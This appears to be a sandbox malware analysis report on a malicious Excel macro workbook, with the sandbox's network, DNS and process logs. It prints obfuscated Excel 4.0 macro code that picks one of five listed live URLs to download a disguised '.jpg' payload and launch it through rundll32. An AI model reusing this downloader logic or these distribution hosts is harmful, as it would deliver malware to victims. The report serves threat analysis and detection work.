                                                                                                                                                    SSDEEP:384:mMfowh92aGcoKKRR6xt7k5SV8m2ylTQ8aoVT0QNuzWKP8WZoms:mMflhQaGc7SsFk5S6f6TfW+u7DZRs
                                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Refusal-743510550-01212021.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,=B154(),"=FORMULA.FILL(Mols!U54&Mols!U55&Mols!U56&Mols!U57&Mols!U58&Mols!U59,BB53)","=FORMULA.FILL(Mols!AC56,HI18807)","=EXEC(""r""&Mols!AC60&"" ""&Mols!AC59&HG9961)",=B156(),=C156(),=HALT(),"=FORMULA.FILL(Mols!V53&Mols!V54&Mols!V55&Mols!V56&Mols!V57&Mols!V58&Mols!V59&Mols!V60&Mols!V61&Mols!V62&Mols!V63&Mols!V64&Mols!V65&Mols!V66&Mols!V67&Mols!V68&Mols!V69&Mols!V70,HZ48004)","=FORMULA.FILL(Mols!AC57,AN32726)",,=B158(),=C158(),"=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)","=FORMULA.FILL(Mols!U62&Mols!U63&Mols!U64&Mols!U65&Mols!U66&Mols!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)","=Niokaser(0,GT17028,AQ4875,0,0)",=B160(),=C160(),,"=FORMULA.FILL(Mols!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)",=B162(),=C162(),"=Vuolasd(GT17028,AQ4875,1)","=FORMULA.FILL(Mols!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(Mols!AC60,AS41071)",=A158(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(Mols!AC61,HG9961)",,indianhealthtrust.com/yhnqj/5555555555.jpg,=C154(),,destock-optic.fr/cdmhgbfhfwq/5555555555.jpg,,,themagicalfortress.com/bwqbfbse/5555555555.jpg,,,www.toteteca.com/qzkiodlofm/5555555555.jpg,"=INDEX(D165:D169,RANDBETWEEN(1,5))",,christiecentre.com.au/exmpjzwsb/5555555555.jpg

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 25, 2021 18:15:19.054480076 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:19.229312897 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:19.229507923 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:19.230396032 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:19.410403013 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:19.774077892 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:19.774235010 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:19.805260897 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:19.979654074 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:20.318835974 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:20.318990946 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:15:25.323822021 CET8049717172.107.2.98192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:25.323972940 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:04.778321028 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:05.260665894 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:06.137185097 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:07.620459080 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:10.573671103 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:16.480372906 CET4971780192.168.2.3172.107.2.98
                                                                                                                                                    Jan 25, 2021 18:17:28.293904066 CET4971780192.168.2.3172.107.2.98

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 25, 2021 18:15:03.501425028 CET5754453192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:03.549249887 CET53575448.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:03.876624107 CET5598453192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:03.937179089 CET53559848.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:05.076786995 CET6418553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:05.133105993 CET53641858.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:06.468769073 CET6511053192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:06.516627073 CET53651108.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:07.614617109 CET5836153192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:07.662652016 CET53583618.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:13.458655119 CET6349253192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:13.509581089 CET53634928.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:14.459891081 CET6083153192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:14.524117947 CET53608318.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:14.841253996 CET6010053192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:14.901705980 CET53601008.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:15.430280924 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:15.488142967 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:16.475363970 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:16.531850100 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:17.478106976 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:17.534487009 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:18.847089052 CET5014153192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:18.997756004 CET5302353192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:19.046256065 CET53530238.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:19.051544905 CET53501418.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:19.465241909 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:19.522986889 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:20.299026012 CET4956353192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:20.347001076 CET53495638.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:21.769804001 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:21.818334103 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:22.774718046 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:22.822586060 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:23.487117052 CET5319553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:23.543880939 CET53531958.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:23.941955090 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:23.989905119 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:26.922650099 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:26.970556021 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:30.655236959 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:30.723555088 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:15:36.034636021 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:15:36.085500956 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:25.032805920 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:25.080862999 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:34.659070969 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:34.717138052 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:52.365206003 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:52.413027048 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:52.979456902 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:53.035579920 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:53.616837978 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:53.676183939 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:53.950036049 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:54.019157887 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:54.136198997 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:54.192524910 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:54.736893892 CET5657953192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:54.785021067 CET53565798.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:55.688317060 CET6063353192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:55.744941950 CET53606338.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:56.690700054 CET6129253192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:56.747098923 CET53612928.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:58.631187916 CET6361953192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:58.688498974 CET53636198.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:16:59.749032021 CET6493853192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:16:59.797225952 CET53649388.8.8.8192.168.2.3
                                                                                                                                                    Jan 25, 2021 18:17:00.286237001 CET6194653192.168.2.38.8.8.8
                                                                                                                                                    Jan 25, 2021 18:17:00.346303940 CET53619468.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 25, 2021 18:15:18.847089052 CET192.168.2.38.8.8.80x56cfStandard query (0)www.toteteca.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 25, 2021 18:15:19.051544905 CET8.8.8.8192.168.2.30x56cfNo error (0)www.toteteca.comtoteteca.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Jan 25, 2021 18:15:19.051544905 CET8.8.8.8192.168.2.30x56cfNo error (0)toteteca.com172.107.2.98A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • www.toteteca.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349717172.107.2.9880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 25, 2021 18:15:19.230396032 CET978OUTGET /qzkiodlofm/5555555555.jpg HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: www.toteteca.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 25, 2021 18:15:19.774077892 CET990INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 25 Jan 2021 17:15:18 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Jan 25, 2021 18:15:19.805260897 CET990OUTGET /qzkiodlofm/5555555555.jpg HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: www.toteteca.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 25, 2021 18:15:20.318835974 CET1089INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 25 Jan 2021 17:15:19 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:18:15:12
                                                                                                                                                    Start date:25/01/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0xdf0000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:18:15:19
                                                                                                                                                    Start date:25/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
                                                                                                                                                    Imagebase:0x1260000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >